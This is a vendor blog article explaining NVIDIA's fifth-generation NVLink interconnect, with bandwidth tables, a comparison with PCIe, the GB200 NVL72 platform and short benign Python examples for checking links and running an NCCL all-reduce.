NVIDIA NVLink 5.0: Accelerating Multi-GPU Communication


As AI workloads continue to outpace the capabilities of existing infrastructure, lightning-fast inter-GPU communication within a server cluster has become more vital than ever.

NVIDIA’s latest fifth-generation NVLink and NVLink Switch address this challenge, redefining the limits of multi-GPU communication and unlocking new possibilities in high-performance computing.

What is NVLink 5.0?

Fifth-generation NVLink, introduced in 2024, is the latest iteration of NVIDIA’s ultra-high-speed interconnect technology for direct communication between multiple GPUs within a system.

Purpose-built for multi-GPU Blackwell architecture systems, NVLink 5.0 delivers 1.8 TB/s of bidirectional bandwidth per GPU, double the 900 GB/s of the previous fourth generation and roughly 14x the bandwidth of an equivalent PCIe 5.0 connection.

To achieve full non-blocking connectivity between GPUs within a server rack, the NVLink Switch chip acts as a rack-level interconnect. Each Blackwell GPU reaches its 1.8 TB/s of aggregate bidirectional bandwidth through 18 NVLink links of 100 GB/s each, enabling all-to-all communication among GPUs. This allows the combined processing power of up to 576 GPUs to be harnessed as a single high-performance accelerator for compute-intensive AI workloads.
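A quick back-of-the-envelope check, shown in the minimal Python sketch below, ties these figures together; all numbers are taken from this article and the tables that follow.

```python
# Back-of-the-envelope check of the NVLink 5.0 figures quoted in this article.
LINKS_PER_GPU = 18            # NVLink 5.0 links per Blackwell GPU
GB_S_PER_LINK_BIDIR = 100     # bidirectional bandwidth per link (50 GB/s each direction)
DOMAIN_GPUS = 576             # maximum GPUs in one NVLink Switch domain

per_gpu = LINKS_PER_GPU * GB_S_PER_LINK_BIDIR   # 1,800 GB/s = 1.8 TB/s per GPU
domain_total = DOMAIN_GPUS * per_gpu            # 1,036,800 GB/s, i.e. roughly 1 PB/s

print(f"Per-GPU bidirectional bandwidth: {per_gpu} GB/s ({per_gpu / 1000:.1f} TB/s)")
print(f"576-GPU domain aggregate: {domain_total / 1_000_000:.2f} PB/s")
```

The domain aggregate works out to about 1 PB/s, matching the NVLink Switch row in the table below.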

Table: NVLink Evolution

Generation | Bandwidth per GPU | Max Links per GPU | Supported Architectures
2nd Gen | 300 GB/s | 6 | Volta
3rd Gen | 600 GB/s | 12 | Ampere
4th Gen | 900 GB/s | 18 | Hopper
5th Gen | 1,800 GB/s | 18 | Blackwell

Source: NVIDIA

Table: NVLink Switch Evolution

Generation | GPUs in NVLink Domain | GPU-to-GPU Bandwidth | Total Bandwidth | Supported Architectures
1st Gen | Up to 8 | 300 GB/s | 2.4 TB/s | Volta
2nd Gen | Up to 8 | 600 GB/s | 4.8 TB/s | Ampere
3rd Gen | Up to 8 | 900 GB/s | 7.2 TB/s | Hopper
NVLink Switch | Up to 576 | 1,800 GB/s | 1 PB/s | Blackwell

Source: NVIDIA

Comparing NVLink 5.0 and Latest PCIe Generations

The latest PCIe generations, PCIe 5.0 and PCIe 6.0, are general-purpose interfaces for connecting a wide range of components, such as GPUs, storage, and networking devices, with PCIe 6.0 doubling the bandwidth of PCIe 5.0.

NVLink 5.0, on the other hand, is a specialized high-speed interconnect designed to maximize data transfer between GPUs.

While PCIe excels at versatile connectivity, NVLink 5.0’s significantly higher bandwidth makes it the preferred choice for GPU-intensive workloads like AI training and high-performance computing.

Comparison Table: Maximum Data Rate of NVLink 5.0 and PCIe 5.0/6.0

Technology | Configuration | Maximum Data Rate | Notes
PCIe 5.0 | x16 | 128 GB/s | PCIe 4.0 and PCIe 5.0 are the most commonly used PCIe generations in today’s consumer and enterprise systems.
PCIe 6.0 | x16 | 256 GB/s | Delivers 2x the maximum data rate of PCIe 5.0; currently in the early stages of adoption.
NVLink 5.0 | Per GPU | 1,800 GB/s | Delivers roughly 14x the maximum data rate of PCIe 5.0 and 7x that of PCIe 6.0.

The table above directly compares the data transfer rates of PCIe 5.0, PCIe 6.0, and NVLink 5.0.

This stark difference highlights NVLink 5.0’s capability to handle the large data sets typical in AI and high-performance computing workloads, offering approximately 14x and 7x the data transfer speeds of PCIe 5.0 and PCIe 6.0, respectively.
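The same ratios fall out of a couple of lines of arithmetic; the minimal Python sketch below uses only the data rates from the table above.

```python
# Ratio check for the comparison table above.
rates_gb_s = {"PCIe 5.0 x16": 128, "PCIe 6.0 x16": 256}
nvlink_gb_s = 1800  # NVLink 5.0, per GPU

for name, rate in rates_gb_s.items():
    print(f"NVLink 5.0 vs {name}: {nvlink_gb_s / rate:.1f}x")
# -> roughly 14.1x over PCIe 5.0 and 7.0x over PCIe 6.0
```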

NVLink 5.0 Key Components

The key components of NVLink 5.0 include:

  1. Blackwell GPUs with 5th Gen NVLink:
    • 18 NVLink links per GPU, providing 1.8 TB/s of total bidirectional bandwidth (a quick way to inspect these links on a live system is sketched after this list).
    • 50 GB/s per link in each direction (100 GB/s bidirectional), doubling the per-link bandwidth of NVLink in Hopper GPUs.
    • This high bandwidth enables efficient communication for large AI models, exceeding PCIe Gen5 bandwidth by 14x.
  2. NVLink Switch ASIC and Switches:
    • Enable scaling up to 576 GPUs within a single NVLink domain for model parallelism.
    • Deliver 4x bandwidth efficiency with NVIDIA Scalable Hierarchical Aggregation and Reduction Protocol (SHARP)™ FP8 support.
    • Support systems like the GB200 NVL72, which offers 9x the GPU throughput of a single eight-GPU system.
  3. NVIDIA Unified Fabric Manager (UFM®):
    • Provides production-proven management for the NVLink compute fabric, ensuring reliable and efficient communication between GPUs.
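On a live NVLink-equipped system, the per-GPU links referenced in item 1 can be inspected with NVIDIA’s standard tooling. The sketch below simply shells out to nvidia-smi (assuming the NVIDIA driver and nvidia-smi are installed and on the PATH); the exact output format varies by driver version, so it is printed as-is rather than parsed.

```python
# Minimal sketch: list NVLink link status per GPU via nvidia-smi.
# Assumes nvidia-smi is installed; output format varies by driver version,
# so this just prints it for inspection.
import subprocess

result = subprocess.run(
    ["nvidia-smi", "nvlink", "--status"],
    capture_output=True, text=True, check=False,
)
print(result.stdout or result.stderr)
```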

NVLink Communication Scope

NVLink is primarily designed for high-bandwidth, low-latency communication within a single system or tightly integrated multi-GPU setups within the same rack or chassis. NVLink bridges and NVSwitches facilitate GPU-to-GPU and GPU-to-CPU communication within these confines.
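Within a single system, this direct GPU-to-GPU path is exposed to software as CUDA peer access. The minimal PyTorch sketch below (assuming a CUDA-capable multi-GPU node) confirms which device pairs can address each other directly; note that peer access alone does not distinguish an NVLink path from PCIe peer-to-peer.

```python
# Minimal sketch: check direct GPU-to-GPU (peer) access on a multi-GPU node.
# Requires PyTorch with CUDA. Peer access is the capability NVLink-connected
# GPUs expose, though this check alone does not reveal the physical link type.
import torch

if torch.cuda.is_available():
    n = torch.cuda.device_count()
    for src in range(n):
        for dst in range(n):
            if src != dst:
                ok = torch.cuda.can_device_access_peer(src, dst)
                print(f"GPU {src} -> GPU {dst}: peer access {'yes' if ok else 'no'}")
else:
    print("No CUDA devices visible")
```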

NVLink leverages serial copper interconnects for the high-bandwidth, low-latency GPU-to-GPU and server-to-server links within a rack.

For connecting across different racks, technologies such as RoCE, InfiniBand, or high-speed Ethernet with optical fiber are more suitable and necessary to maintain high performance and low latency over greater distances.

In large-scale data centers, a hybrid approach is often employed, using NVLink for intra-rack communication and other networking technologies like RoCE or InfiniBand for inter-rack communication, combining the strengths of each technology.
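In practice, this hybrid topology is handled largely by the communication library: NCCL uses NVLink between GPUs in the same node or NVLink domain and falls back to InfiniBand, RoCE, or Ethernet between nodes. The sketch below is a minimal torch.distributed all-reduce with the NCCL backend (the script name and torchrun launch line are illustrative); nothing NVLink-specific needs to be coded by hand.

```python
# Minimal sketch of a multi-GPU all-reduce with the NCCL backend.
# NCCL transparently uses NVLink between GPUs in the same node/NVLink domain
# and IB/RoCE/Ethernet between nodes.
# Launch (illustrative): torchrun --nproc_per_node=8 allreduce_demo.py
import os
import torch
import torch.distributed as dist

def main():
    dist.init_process_group(backend="nccl")      # rank/world size come from torchrun env vars
    local_rank = int(os.environ["LOCAL_RANK"])
    torch.cuda.set_device(local_rank)

    # Each rank contributes a tensor; after all_reduce every rank holds the sum.
    x = torch.ones(1024, device="cuda") * dist.get_rank()
    dist.all_reduce(x, op=dist.ReduceOp.SUM)
    print(f"rank {dist.get_rank()}: sum element = {x[0].item()}")

    dist.destroy_process_group()

if __name__ == "__main__":
    main()
```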

Read More About RoCE: The Role of RoCE (RDMA over Converged Ethernet) in AI Workloads

The NVIDIA GB200 NVL72 Server Platform

The NVIDIA GB200 NVL72 was designed around NVLink 5.0’s capabilities to deliver unprecedented levels of performance. It uses the NVLink 5.0 Switch System to create a massive GPU cluster for accelerated AI and HPC workloads.

The GB200 NVL72 demonstrates NVLink 5.0’s effectiveness in a variety of use cases, including the following:

    • Real-Time Trillion-Parameter LLM Inference: NVLink 5.0’s high bandwidth and low latency, combined with the GB200’s architecture, deliver 30x faster inference for large language models compared to previous generations.
    • Massive-Scale Training: The system’s 72-GPU NVLink domain, facilitated by NVLink 5.0, enables 4x faster training for large language models.
    • Energy-Efficient Infrastructure: Liquid cooling and the efficient NVLink interconnect contribute to a 25x performance-per-watt improvement over air-cooled systems.
    • Data Processing: The GB200’s architecture, coupled with NVLink 5.0, accelerates key database queries by 18x compared to CPUs.

Recommended Read: The Power of Network Automation

Conclusion

Fifth-generation NVLink introduces remarkable advancements, including unprecedented bandwidth that enables seamless communication between hundreds of GPUs and paves the way for exascale computing and multi-trillion-parameter AI models. The NVLink Switch further amplifies this power, facilitating efficient scaling across multiple servers and unlocking new levels of performance.

With ongoing advancements in AI and the increasing demand for computational power, NVLink is poised to remain a critical technology, shaping the future of high-performance computing and accelerating groundbreaking discoveries in various fields. As NVIDIA continues to invest in and refine NVLink, we can anticipate even more impressive developments that will further transform the landscape of accelerated computing.

About Hardware Nation:

Hardware Nation is a professional services company that accelerates network transformation through an open networking approach, enabling freedom of choice, flexibility, and cost efficiency. Our seasoned experts have worked on projects for some of the world’s leading organizations, leveraging a hybrid cloud-first and AI-enabled approach. We help our customers navigate the ecosystem, drawing on decades of experience. Our deployments are powered by leading white box and OEM network, compute, and storage vendors. Our expertise encompasses a wide range of industries and use cases, including enterprise, cloud, data center, AI, 5G/ISP infrastructure, and edge IT.

Alex Cronin

Co-Founder and Solutions Architect

Alex Cronin is a seasoned Solutions Architect with over 15 years of experience in networking and disaggregated infrastructure. His career is defined by aligning enterprise technology with business needs across diverse market segments, from emerging startups to Fortune 500 companies. He has worked on digital infrastructure projects covering network design and software solutions for data center operators, service providers, and enterprises. He is continuously collaborating with Hardware Nation Labs R&D to explore and pioneer the latest advancements in open networking and is assessing the applicability of AI/ML technology across enterprise, data center, and service provider infrastructures.

Rahul Narwal

Content Writer

Rahul is a content writer passionate about AI and software development, blending creativity with technical expertise. He creates engaging articles, visuals, and research papers in collaboration with seasoned experts, simplifying complex topics for both technical and non-technical audiences.

Learn more about our approach to AI infrastructure.